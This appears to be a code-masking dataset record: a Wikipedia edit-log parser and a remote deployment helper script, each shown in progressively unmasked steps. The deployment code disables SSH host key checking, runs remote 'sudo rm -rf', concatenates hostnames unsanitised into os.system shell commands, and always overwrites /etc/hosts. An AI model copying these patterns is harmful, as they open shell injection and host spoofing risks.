article_id,rev_id,title,timestamp,username,user_id = 'a'+revision[1],'e'+revision[2],revision[3],revision[4],revision[5],'u'+revision[6].strip()
# Ignore anonymous edits
if user_id.startswith('uip'):
continue
# Parse article category
category_line = edit[1].split(' ')
if len(category_line) != 1:
category = category_line[1].strip()
else:
category = ""
# Parse whether edit is minor and number of words edited
minor = edit[11].split(' ')[1].strip()
word_count = edit[12].split(' ')[1].strip()
# Create output line and write to stdout
outline = format_string % (article_id,rev_id,user_id,username,title,timestamp,category,minor,word_count)
sys.stdout.write(outline)
if __name__ == '__main__':
main()
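# Sketch of the 14-line record layout the parser above assumes (field labels
# follow the common Wikipedia edit-history dump format; treat the exact label
# names as assumptions -- only lines 0, 1, 11 and 12 are actually read):
#
#   line 0:  REVISION <article_id> <rev_id> <title> <timestamp> <username> <user_id>
#   line 1:  CATEGORY <categories...>
#   lines 2-10: image/link/text metadata (ignored here)
#   line 11: MINOR <0|1>
#   line 12: TEXTDATA <word_count>
#   line 13: blank separator line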
|
flexible
|
{
"blob_id": "f6b2169a4644f4f39bbdebd9bb9c7cc637b54f8b",
"index": 9920,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef main():\n format_string = '%s %s %s %s %s %s %s %s %s\\n'\n while True:\n edit = [sys.stdin.readline() for i in range(14)]\n if edit[13] == '':\n break\n revision = edit[0].split(' ')\n article_id, rev_id, title, timestamp, username, user_id = ('a' +\n revision[1], 'e' + revision[2], revision[3], revision[4],\n revision[5], 'u' + revision[6].strip())\n if user_id.startswith('uip'):\n continue\n category_line = edit[1].split(' ')\n if len(category_line) != 1:\n category = category_line[1].strip()\n else:\n category = ''\n minor = edit[11].split(' ')[1].strip()\n word_count = edit[12].split(' ')[1].strip()\n outline = format_string % (article_id, rev_id, user_id, username,\n title, timestamp, category, minor, word_count)\n sys.stdout.write(outline)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef main():\n format_string = '%s %s %s %s %s %s %s %s %s\\n'\n while True:\n edit = [sys.stdin.readline() for i in range(14)]\n if edit[13] == '':\n break\n revision = edit[0].split(' ')\n article_id, rev_id, title, timestamp, username, user_id = ('a' +\n revision[1], 'e' + revision[2], revision[3], revision[4],\n revision[5], 'u' + revision[6].strip())\n if user_id.startswith('uip'):\n continue\n category_line = edit[1].split(' ')\n if len(category_line) != 1:\n category = category_line[1].strip()\n else:\n category = ''\n minor = edit[11].split(' ')[1].strip()\n word_count = edit[12].split(' ')[1].strip()\n outline = format_string % (article_id, rev_id, user_id, username,\n title, timestamp, category, minor, word_count)\n sys.stdout.write(outline)\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "import sys\n\n\ndef main():\n format_string = '%s %s %s %s %s %s %s %s %s\\n'\n while True:\n edit = [sys.stdin.readline() for i in range(14)]\n if edit[13] == '':\n break\n revision = edit[0].split(' ')\n article_id, rev_id, title, timestamp, username, user_id = ('a' +\n revision[1], 'e' + revision[2], revision[3], revision[4],\n revision[5], 'u' + revision[6].strip())\n if user_id.startswith('uip'):\n continue\n category_line = edit[1].split(' ')\n if len(category_line) != 1:\n category = category_line[1].strip()\n else:\n category = ''\n minor = edit[11].split(' ')[1].strip()\n word_count = edit[12].split(' ')[1].strip()\n outline = format_string % (article_id, rev_id, user_id, username,\n title, timestamp, category, minor, word_count)\n sys.stdout.write(outline)\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "import sys\n\ndef main():\n\t# String to format output\n\tformat_string = \"%s %s %s %s %s %s %s %s %s\\n\"\n\twhile True:\n\t\t# Read 14 lines at a time from stdin for wikipedia dataset\n\t\tedit = [sys.stdin.readline() for i in range(14)]\n\t\t# Break if we've reached the end of stdin\n\t\tif edit[13] == \"\":\n\t\t\tbreak\n\t\t# Parse data from revision line\n\t\trevision = edit[0].split(' ')\n\t\tarticle_id,rev_id,title,timestamp,username,user_id = 'a'+revision[1],'e'+revision[2],revision[3],revision[4],revision[5],'u'+revision[6].strip()\n\t\t# Ignore anonymous edits\n\t\tif user_id.startswith('uip'):\n\t\t\tcontinue\n\t\t# Parse article category\n\t\tcategory_line = edit[1].split(' ')\n\t\tif len(category_line) != 1:\n\t\t\tcategory = category_line[1].strip()\n\t\telse:\n\t\t\tcategory = \"\"\n\t\t# Parse whether edit is minor and number of words edited\n\t\tminor = edit[11].split(' ')[1].strip()\n\t\tword_count = edit[12].split(' ')[1].strip()\n\t\t# Create output line and write to stdout\n\t\toutline = format_string % (article_id,rev_id,user_id,username,title,timestamp,category,minor,word_count)\n\t\tsys.stdout.write(outline)\n\nif __name__ == '__main__':\n\tmain()",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class color:
PURPLE = '\x1b[95m'
CYAN = '\x1b[96m'
DARKCYAN = '\x1b[36m'
BLUE = '\x1b[94m'
GREEN = '\x1b[92m'
YELLOW = '\x1b[93m'
RED = '\x1b[91m'
BOLD = '\x1b[1m'
UNDERLINE = '\x1b[4m'
END = '\x1b[0m'
<|reserved_special_token_0|>
def hostIsUp(host):
if os.system('ping -c 1 ' + host + ' >> /dev/null 2>&1'):
return False
return True
<|reserved_special_token_0|>
def updateFileServer(config, serverName):
ip = getIpServerName(config, serverName)
out = subprocess.run(['tar', 'czf',
'/tmp/SDTD-Mazerunner-Script.tar.gz', '.'], cwd=os.getcwd(), stdout
=subprocess.DEVNULL, stderr=subprocess.DEVNULL, check=True)
if out.returncode == 0:
logging.info('Compressing directory done [success]')
else:
logging.error('Compressing directory failed [error]')
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip, 'sudo rm -rf SDTD-Mazerunner/script/'])
out = subprocess.run(['scp', '-pq', '-o', 'StrictHostKeyChecking=no',
'-i', '~/.ssh/xnet', '/tmp/SDTD-Mazerunner-Script.tar.gz', 'xnet@' +
ip + ':~/'], check=True)
if out.returncode == 0:
logging.info('Transfer done [success]')
else:
logging.error('Transferring files failed [error]')
logging.info('Detar file ...')
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip, 'mkdir -p SDTD-Mazerunner/script'])
out = subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip,
'tar xzf SDTD-Mazerunner-Script.tar.gz -C SDTD-Mazerunner/script'])
if out.returncode == 0:
logging.info('Decompressing directory done [success]')
else:
logging.error('Decompressing directory failed [error]')
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip, 'rm SDTD-Mazerunner-Script.tar.gz'])
return
def installEnvironmentServer(config, serverName):
ip = getIpServerName(config, serverName)
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip,
'source ~/.profile; ./script/install_config_machine.py'])
return
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class color:
PURPLE = '\x1b[95m'
CYAN = '\x1b[96m'
DARKCYAN = '\x1b[36m'
BLUE = '\x1b[94m'
GREEN = '\x1b[92m'
YELLOW = '\x1b[93m'
RED = '\x1b[91m'
BOLD = '\x1b[1m'
UNDERLINE = '\x1b[4m'
END = '\x1b[0m'
<|reserved_special_token_0|>
def getIp():
ip = os.popen(
'ifconfig ens3 | grep "inet ad" | cut -f2 -d: | awk \'{print $1}\'',
'r').read()
ip = ip.replace('\n', '')
return ip
<|reserved_special_token_0|>
def hostIsUp(host):
if os.system('ping -c 1 ' + host + ' >> /dev/null 2>&1'):
return False
return True
def getIpServerName(config, serverName):
ip = ''
value = serverName.split('-')
if len(value) == 2:
try:
hosts = config.get(value[0], 'hosts').split(',')
ip = hosts[int(value[1]) - 1].strip(' \n')
except:
return ip
return ip
def updateFileServer(config, serverName):
ip = getIpServerName(config, serverName)
out = subprocess.run(['tar', 'czf',
'/tmp/SDTD-Mazerunner-Script.tar.gz', '.'], cwd=os.getcwd(), stdout
=subprocess.DEVNULL, stderr=subprocess.DEVNULL, check=True)
if out.returncode == 0:
logging.info('Compressing directory done [success]')
else:
logging.error('Compressing directory failed [error]')
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip, 'sudo rm -rf SDTD-Mazerunner/script/'])
out = subprocess.run(['scp', '-pq', '-o', 'StrictHostKeyChecking=no',
'-i', '~/.ssh/xnet', '/tmp/SDTD-Mazerunner-Script.tar.gz', 'xnet@' +
ip + ':~/'], check=True)
if out.returncode == 0:
logging.info('Transfer done [success]')
else:
logging.error('Transferring files failed [error]')
logging.info('Detar file ...')
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip, 'mkdir -p SDTD-Mazerunner/script'])
out = subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip,
'tar xzf SDTD-Mazerunner-Script.tar.gz -C SDTD-Mazerunner/script'])
if out.returncode == 0:
logging.info('Decompressing directory done [success]')
else:
logging.error('Decompressing directory failed [error]')
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip, 'rm SDTD-Mazerunner-Script.tar.gz'])
return
def installEnvironmentServer(config, serverName):
ip = getIpServerName(config, serverName)
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip,
'source ~/.profile; ./script/install_config_machine.py'])
return
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class color:
PURPLE = '\x1b[95m'
CYAN = '\x1b[96m'
DARKCYAN = '\x1b[36m'
BLUE = '\x1b[94m'
GREEN = '\x1b[92m'
YELLOW = '\x1b[93m'
RED = '\x1b[91m'
BOLD = '\x1b[1m'
UNDERLINE = '\x1b[4m'
END = '\x1b[0m'
def getHostsByKey(config, key):
hosts = config.get(key, 'hosts').split(',')
index = 0
for host in hosts:
hosts[index] = host.strip(' \n')
index += 1
return hosts
def getIp():
ip = os.popen(
'ifconfig ens3 | grep "inet ad" | cut -f2 -d: | awk \'{print $1}\'',
'r').read()
ip = ip.replace('\n', '')
return ip
<|reserved_special_token_0|>
def deleteLineWithString(pathFile, stringResearch):
contenu = ''
fichier = open(pathFile, 'r')
for ligne in fichier:
if not stringResearch in ligne:
contenu += ligne
fichier.close()
fichier = open('tmp.txt', 'w')
fichier.write(contenu)
fichier.close()
os.system('sudo mv tmp.txt /etc/hosts >> /dev/null 2>&1')
return
def hostIsUp(host):
if os.system('ping -c 1 ' + host + ' >> /dev/null 2>&1'):
return False
return True
def getIpServerName(config, serverName):
ip = ''
value = serverName.split('-')
if len(value) == 2:
try:
hosts = config.get(value[0], 'hosts').split(',')
ip = hosts[int(value[1]) - 1].strip(' \n')
except:
return ip
return ip
def updateFileServer(config, serverName):
ip = getIpServerName(config, serverName)
out = subprocess.run(['tar', 'czf',
'/tmp/SDTD-Mazerunner-Script.tar.gz', '.'], cwd=os.getcwd(), stdout
=subprocess.DEVNULL, stderr=subprocess.DEVNULL, check=True)
if out.returncode == 0:
logging.info('Compressing directory done [success]')
else:
logging.error('Compressing directory failed [error]')
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip, 'sudo rm -rf SDTD-Mazerunner/script/'])
out = subprocess.run(['scp', '-pq', '-o', 'StrictHostKeyChecking=no',
'-i', '~/.ssh/xnet', '/tmp/SDTD-Mazerunner-Script.tar.gz', 'xnet@' +
ip + ':~/'], check=True)
if out.returncode == 0:
logging.info('Transfer done [success]')
else:
logging.error('Transferring files failed [error]')
logging.info('Detar file ...')
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip, 'mkdir -p SDTD-Mazerunner/script'])
out = subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip,
'tar xzf SDTD-Mazerunner-Script.tar.gz -C SDTD-Mazerunner/script'])
if out.returncode == 0:
logging.info('Decompressing directory done [success]')
else:
logging.error('Decompressing directory failed [error]')
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip, 'rm SDTD-Mazerunner-Script.tar.gz'])
return
def installEnvironmentServer(config, serverName):
ip = getIpServerName(config, serverName)
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip,
'source ~/.profile; ./script/install_config_machine.py'])
return
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class color:
PURPLE = '\x1b[95m'
CYAN = '\x1b[96m'
DARKCYAN = '\x1b[36m'
BLUE = '\x1b[94m'
GREEN = '\x1b[92m'
YELLOW = '\x1b[93m'
RED = '\x1b[91m'
BOLD = '\x1b[1m'
UNDERLINE = '\x1b[4m'
END = '\x1b[0m'
def getHostsByKey(config, key):
hosts = config.get(key, 'hosts').split(',')
index = 0
for host in hosts:
hosts[index] = host.strip(' \n')
index += 1
return hosts
def getIp():
ip = os.popen(
'ifconfig ens3 | grep "inet ad" | cut -f2 -d: | awk \'{print $1}\'',
'r').read()
ip = ip.replace('\n', '')
return ip
def isAlreadyAdd(pathFile, string):
file = open(pathFile)
for line in file:
if string in line:
return True
return False
def deleteLineWithString(pathFile, stringResearch):
contenu = ''
fichier = open(pathFile, 'r')
for ligne in fichier:
if not stringResearch in ligne:
contenu += ligne
fichier.close()
fichier = open('tmp.txt', 'w')
fichier.write(contenu)
fichier.close()
os.system('sudo mv tmp.txt /etc/hosts >> /dev/null 2>&1')
return
def hostIsUp(host):
if os.system('ping -c 1 ' + host + ' >> /dev/null 2>&1'):
return False
return True
def getIpServerName(config, serverName):
ip = ''
value = serverName.split('-')
if len(value) == 2:
try:
hosts = config.get(value[0], 'hosts').split(',')
ip = hosts[int(value[1]) - 1].strip(' \n')
except:
return ip
return ip
def updateFileServer(config, serverName):
ip = getIpServerName(config, serverName)
out = subprocess.run(['tar', 'czf',
'/tmp/SDTD-Mazerunner-Script.tar.gz', '.'], cwd=os.getcwd(), stdout
=subprocess.DEVNULL, stderr=subprocess.DEVNULL, check=True)
if out.returncode == 0:
logging.info('Compressing directory done [success]')
else:
logging.error('Compressing directory failed [error]')
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip, 'sudo rm -rf SDTD-Mazerunner/script/'])
out = subprocess.run(['scp', '-pq', '-o', 'StrictHostKeyChecking=no',
'-i', '~/.ssh/xnet', '/tmp/SDTD-Mazerunner-Script.tar.gz', 'xnet@' +
ip + ':~/'], check=True)
if out.returncode == 0:
logging.info('Transfer done [success]')
else:
logging.error('Transferring files failed [error]')
logging.info('Detar file ...')
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip, 'mkdir -p SDTD-Mazerunner/script'])
out = subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip,
'tar xzf SDTD-Mazerunner-Script.tar.gz -C SDTD-Mazerunner/script'])
if out.returncode == 0:
logging.info('Decompressing directory done [success]')
else:
logging.error('Decompressing directory failed [error]')
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip, 'rm SDTD-Mazerunner-Script.tar.gz'])
return
def installEnvironmentServer(config, serverName):
ip = getIpServerName(config, serverName)
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',
'~/.ssh/xnet', 'xnet@' + ip,
'source ~/.profile; ./script/install_config_machine.py'])
return
<|reserved_special_token_1|>
#!/usr/bin/env python3
import os
import subprocess
import logging
class color:
PURPLE = '\033[95m'
CYAN = '\033[96m'
DARKCYAN = '\033[36m'
BLUE = '\033[94m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
END = '\033[0m'
# Recover all IPs for one component. Returns the list of IPs.
def getHostsByKey(config, key):
hosts = config.get(key, "hosts").split(',')
index = 0
for host in hosts:
hosts[index] = host.strip(' \n')
index += 1
return hosts
# Function that returns the IP of the current machine
def getIp():
ip = os.popen('ifconfig ens3 | grep "inet ad" | cut -f2 -d: | awk \'{print $1}\'', "r").read()
ip = ip.replace('\n', '')
return ip
# Check if the string is already present in the file
def isAlreadyAdd(pathFile, string):
file = open(pathFile)
for line in file:
if string in line:
return True
return False
def deleteLineWithString(pathFile, stringResearch):
contenu = ""
fichier = open(pathFile, "r")
for ligne in fichier:
if not (stringResearch in ligne):
contenu += ligne
fichier.close()
fichier = open('tmp.txt', 'w')
fichier.write(contenu)
fichier.close()
os.system('sudo mv tmp.txt /etc/hosts >> /dev/null 2>&1')
return
# Function to check whether a host is up
def hostIsUp(host):
if os.system('ping -c 1 ' + host + ' >> /dev/null 2>&1'):
return False
return True
# Function to recover an IP from a server name
def getIpServerName(config, serverName):
ip = ""
value = serverName.split('-')
if len(value) == 2:
try:
hosts = config.get(value[0], "hosts").split(',')
ip = hosts[int(value[1]) - 1].strip(' \n')
except:
return ip
return ip
# Function to update files on a specific server
def updateFileServer(config, serverName):
ip = getIpServerName(config, serverName)
out = subprocess.run(['tar', 'czf', '/tmp/SDTD-Mazerunner-Script.tar.gz', '.'],
cwd=os.getcwd(),
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, check=True)
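    # Note: check=True makes subprocess.run() raise CalledProcessError on a
    # non-zero exit, so the else branches below mainly document intent; they
    # are not reached when a command fails.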
if out.returncode == 0:
logging.info("Compressing directory done [success]")
else:
logging.error("Compressing directory failed [error]")
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i', '~/.ssh/xnet', 'xnet@' + ip,
'sudo rm -rf SDTD-Mazerunner/script/'])
out = subprocess.run(
['scp', '-pq', '-o', 'StrictHostKeyChecking=no', '-i', '~/.ssh/xnet', '/tmp/SDTD-Mazerunner-Script.tar.gz',
'xnet@' + ip + ':~/'], check=True)
if out.returncode == 0:
logging.info("Transfer done [success]")
else:
logging.error("Transferring files failed [error]")
logging.info("Detar file ...")
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i', '~/.ssh/xnet', 'xnet@' + ip,
'mkdir -p SDTD-Mazerunner/script'])
out = subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i', '~/.ssh/xnet', 'xnet@' + ip,
'tar xzf SDTD-Mazerunner-Script.tar.gz -C SDTD-Mazerunner/script'])
if out.returncode == 0:
logging.info("Decompressing directory done [success]")
else:
logging.error("Decompressing directory failed [error]")
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i', '~/.ssh/xnet', 'xnet@' + ip,
'rm SDTD-Mazerunner-Script.tar.gz'])
return
# Function to install the basic environment
def installEnvironmentServer(config, serverName):
ip = getIpServerName(config, serverName)
subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i', '~/.ssh/xnet', 'xnet@' + ip,
'source ~/.profile; ./script/install_config_machine.py'])
return
|
flexible
|
{
"blob_id": "2c834c734de8f8740176bb5dbb6b123c49924718",
"index": 1697,
"step-1": "<mask token>\n\n\nclass color:\n PURPLE = '\\x1b[95m'\n CYAN = '\\x1b[96m'\n DARKCYAN = '\\x1b[36m'\n BLUE = '\\x1b[94m'\n GREEN = '\\x1b[92m'\n YELLOW = '\\x1b[93m'\n RED = '\\x1b[91m'\n BOLD = '\\x1b[1m'\n UNDERLINE = '\\x1b[4m'\n END = '\\x1b[0m'\n\n\n<mask token>\n\n\ndef hostIsUp(host):\n if os.system('ping -c 1 ' + host + ' >> /dev/null 2>&1'):\n return False\n return True\n\n\n<mask token>\n\n\ndef updateFileServer(config, serverName):\n ip = getIpServerName(config, serverName)\n out = subprocess.run(['tar', 'czf',\n '/tmp/SDTD-Mazerunner-Script.tar.gz', '.'], cwd=os.getcwd(), stdout\n =subprocess.DEVNULL, stderr=subprocess.DEVNULL, check=True)\n if out.returncode == 0:\n logging.info('Compressing directory done [success]')\n else:\n logging.error('Compressing directory failed [error]')\n subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',\n '~/.ssh/xnet', 'xnet@' + ip, 'sudo rm -rf SDTD-Mazerunner/script/'])\n out = subprocess.run(['scp', '-pq', '-o', 'StrictHostKeyChecking=no',\n '-i', '~/.ssh/xnet', '/tmp/SDTD-Mazerunner-Script.tar.gz', 'xnet@' +\n ip + ':~/'], check=True)\n if out.returncode == 0:\n logging.info('Transfer done [success]')\n else:\n logging.error('Transferring files failed [error]')\n logging.info('Detar file ...')\n subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',\n '~/.ssh/xnet', 'xnet@' + ip, 'mkdir -p SDTD-Mazerunner/script'])\n out = subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',\n '~/.ssh/xnet', 'xnet@' + ip,\n 'tar xzf SDTD-Mazerunner-Script.tar.gz -C SDTD-Mazerunner/script'])\n if out.returncode == 0:\n logging.info('Decompressing directory done [success]')\n else:\n logging.error('Decompressing directory failed [error]')\n subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',\n '~/.ssh/xnet', 'xnet@' + ip, 'rm SDTD-Mazerunner-Script.tar.gz'])\n return\n\n\ndef installEnvironmentServer(config, serverName):\n ip = getIpServerName(config, serverName)\n subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',\n '~/.ssh/xnet', 'xnet@' + ip,\n 'source ~/.profile; ./script/install_config_machine.py'])\n return\n",
"step-2": "<mask token>\n\n\nclass color:\n PURPLE = '\\x1b[95m'\n CYAN = '\\x1b[96m'\n DARKCYAN = '\\x1b[36m'\n BLUE = '\\x1b[94m'\n GREEN = '\\x1b[92m'\n YELLOW = '\\x1b[93m'\n RED = '\\x1b[91m'\n BOLD = '\\x1b[1m'\n UNDERLINE = '\\x1b[4m'\n END = '\\x1b[0m'\n\n\n<mask token>\n\n\ndef getIp():\n ip = os.popen(\n 'ifconfig ens3 | grep \"inet ad\" | cut -f2 -d: | awk \\'{print $1}\\'',\n 'r').read()\n ip = ip.replace('\\n', '')\n return ip\n\n\n<mask token>\n\n\ndef hostIsUp(host):\n if os.system('ping -c 1 ' + host + ' >> /dev/null 2>&1'):\n return False\n return True\n\n\ndef getIpServerName(config, serverName):\n ip = ''\n value = serverName.split('-')\n if len(value) == 2:\n try:\n hosts = config.get(value[0], 'hosts').split(',')\n ip = hosts[int(value[1]) - 1].strip(' \\n')\n except:\n return ip\n return ip\n\n\ndef updateFileServer(config, serverName):\n ip = getIpServerName(config, serverName)\n out = subprocess.run(['tar', 'czf',\n '/tmp/SDTD-Mazerunner-Script.tar.gz', '.'], cwd=os.getcwd(), stdout\n =subprocess.DEVNULL, stderr=subprocess.DEVNULL, check=True)\n if out.returncode == 0:\n logging.info('Compressing directory done [success]')\n else:\n logging.error('Compressing directory failed [error]')\n subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',\n '~/.ssh/xnet', 'xnet@' + ip, 'sudo rm -rf SDTD-Mazerunner/script/'])\n out = subprocess.run(['scp', '-pq', '-o', 'StrictHostKeyChecking=no',\n '-i', '~/.ssh/xnet', '/tmp/SDTD-Mazerunner-Script.tar.gz', 'xnet@' +\n ip + ':~/'], check=True)\n if out.returncode == 0:\n logging.info('Transfer done [success]')\n else:\n logging.error('Transferring files failed [error]')\n logging.info('Detar file ...')\n subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',\n '~/.ssh/xnet', 'xnet@' + ip, 'mkdir -p SDTD-Mazerunner/script'])\n out = subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',\n '~/.ssh/xnet', 'xnet@' + ip,\n 'tar xzf SDTD-Mazerunner-Script.tar.gz -C SDTD-Mazerunner/script'])\n if out.returncode == 0:\n logging.info('Decompressing directory done [success]')\n else:\n logging.error('Decompressing directory failed [error]')\n subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',\n '~/.ssh/xnet', 'xnet@' + ip, 'rm SDTD-Mazerunner-Script.tar.gz'])\n return\n\n\ndef installEnvironmentServer(config, serverName):\n ip = getIpServerName(config, serverName)\n subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',\n '~/.ssh/xnet', 'xnet@' + ip,\n 'source ~/.profile; ./script/install_config_machine.py'])\n return\n",
"step-3": "<mask token>\n\n\nclass color:\n PURPLE = '\\x1b[95m'\n CYAN = '\\x1b[96m'\n DARKCYAN = '\\x1b[36m'\n BLUE = '\\x1b[94m'\n GREEN = '\\x1b[92m'\n YELLOW = '\\x1b[93m'\n RED = '\\x1b[91m'\n BOLD = '\\x1b[1m'\n UNDERLINE = '\\x1b[4m'\n END = '\\x1b[0m'\n\n\ndef getHostsByKey(config, key):\n hosts = config.get(key, 'hosts').split(',')\n index = 0\n for host in hosts:\n hosts[index] = host.strip(' \\n')\n index += 1\n return hosts\n\n\ndef getIp():\n ip = os.popen(\n 'ifconfig ens3 | grep \"inet ad\" | cut -f2 -d: | awk \\'{print $1}\\'',\n 'r').read()\n ip = ip.replace('\\n', '')\n return ip\n\n\n<mask token>\n\n\ndef deleteLineWithString(pathFile, stringResearch):\n contenu = ''\n fichier = open(pathFile, 'r')\n for ligne in fichier:\n if not stringResearch in ligne:\n contenu += ligne\n fichier.close()\n fichier = open('tmp.txt', 'w')\n fichier.write(contenu)\n fichier.close()\n os.system('sudo mv tmp.txt /etc/hosts >> /dev/null 2>&1')\n return\n\n\ndef hostIsUp(host):\n if os.system('ping -c 1 ' + host + ' >> /dev/null 2>&1'):\n return False\n return True\n\n\ndef getIpServerName(config, serverName):\n ip = ''\n value = serverName.split('-')\n if len(value) == 2:\n try:\n hosts = config.get(value[0], 'hosts').split(',')\n ip = hosts[int(value[1]) - 1].strip(' \\n')\n except:\n return ip\n return ip\n\n\ndef updateFileServer(config, serverName):\n ip = getIpServerName(config, serverName)\n out = subprocess.run(['tar', 'czf',\n '/tmp/SDTD-Mazerunner-Script.tar.gz', '.'], cwd=os.getcwd(), stdout\n =subprocess.DEVNULL, stderr=subprocess.DEVNULL, check=True)\n if out.returncode == 0:\n logging.info('Compressing directory done [success]')\n else:\n logging.error('Compressing directory failed [error]')\n subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',\n '~/.ssh/xnet', 'xnet@' + ip, 'sudo rm -rf SDTD-Mazerunner/script/'])\n out = subprocess.run(['scp', '-pq', '-o', 'StrictHostKeyChecking=no',\n '-i', '~/.ssh/xnet', '/tmp/SDTD-Mazerunner-Script.tar.gz', 'xnet@' +\n ip + ':~/'], check=True)\n if out.returncode == 0:\n logging.info('Transfer done [success]')\n else:\n logging.error('Transferring files failed [error]')\n logging.info('Detar file ...')\n subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',\n '~/.ssh/xnet', 'xnet@' + ip, 'mkdir -p SDTD-Mazerunner/script'])\n out = subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',\n '~/.ssh/xnet', 'xnet@' + ip,\n 'tar xzf SDTD-Mazerunner-Script.tar.gz -C SDTD-Mazerunner/script'])\n if out.returncode == 0:\n logging.info('Decompressing directory done [success]')\n else:\n logging.error('Decompressing directory failed [error]')\n subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',\n '~/.ssh/xnet', 'xnet@' + ip, 'rm SDTD-Mazerunner-Script.tar.gz'])\n return\n\n\ndef installEnvironmentServer(config, serverName):\n ip = getIpServerName(config, serverName)\n subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',\n '~/.ssh/xnet', 'xnet@' + ip,\n 'source ~/.profile; ./script/install_config_machine.py'])\n return\n",
"step-4": "<mask token>\n\n\nclass color:\n PURPLE = '\\x1b[95m'\n CYAN = '\\x1b[96m'\n DARKCYAN = '\\x1b[36m'\n BLUE = '\\x1b[94m'\n GREEN = '\\x1b[92m'\n YELLOW = '\\x1b[93m'\n RED = '\\x1b[91m'\n BOLD = '\\x1b[1m'\n UNDERLINE = '\\x1b[4m'\n END = '\\x1b[0m'\n\n\ndef getHostsByKey(config, key):\n hosts = config.get(key, 'hosts').split(',')\n index = 0\n for host in hosts:\n hosts[index] = host.strip(' \\n')\n index += 1\n return hosts\n\n\ndef getIp():\n ip = os.popen(\n 'ifconfig ens3 | grep \"inet ad\" | cut -f2 -d: | awk \\'{print $1}\\'',\n 'r').read()\n ip = ip.replace('\\n', '')\n return ip\n\n\ndef isAlreadyAdd(pathFile, string):\n file = open(pathFile)\n for line in file:\n if string in line:\n return True\n return False\n\n\ndef deleteLineWithString(pathFile, stringResearch):\n contenu = ''\n fichier = open(pathFile, 'r')\n for ligne in fichier:\n if not stringResearch in ligne:\n contenu += ligne\n fichier.close()\n fichier = open('tmp.txt', 'w')\n fichier.write(contenu)\n fichier.close()\n os.system('sudo mv tmp.txt /etc/hosts >> /dev/null 2>&1')\n return\n\n\ndef hostIsUp(host):\n if os.system('ping -c 1 ' + host + ' >> /dev/null 2>&1'):\n return False\n return True\n\n\ndef getIpServerName(config, serverName):\n ip = ''\n value = serverName.split('-')\n if len(value) == 2:\n try:\n hosts = config.get(value[0], 'hosts').split(',')\n ip = hosts[int(value[1]) - 1].strip(' \\n')\n except:\n return ip\n return ip\n\n\ndef updateFileServer(config, serverName):\n ip = getIpServerName(config, serverName)\n out = subprocess.run(['tar', 'czf',\n '/tmp/SDTD-Mazerunner-Script.tar.gz', '.'], cwd=os.getcwd(), 